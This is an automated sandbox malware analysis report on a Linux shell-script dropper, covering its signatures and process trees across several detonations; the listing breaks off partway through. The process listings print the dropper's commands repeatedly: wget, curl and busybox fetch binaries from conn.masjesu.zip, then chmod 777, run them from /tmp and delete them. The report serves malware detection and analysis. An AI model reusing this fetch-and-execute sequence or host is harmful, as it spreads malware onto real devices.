Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-b1ztasterq
Target aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
SHA256 aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b

Threat Level: Shows suspicious behavior

The file aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:37

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

29s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-mipsbe-20240729-en

Max time kernel

95s

Max time network

98s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

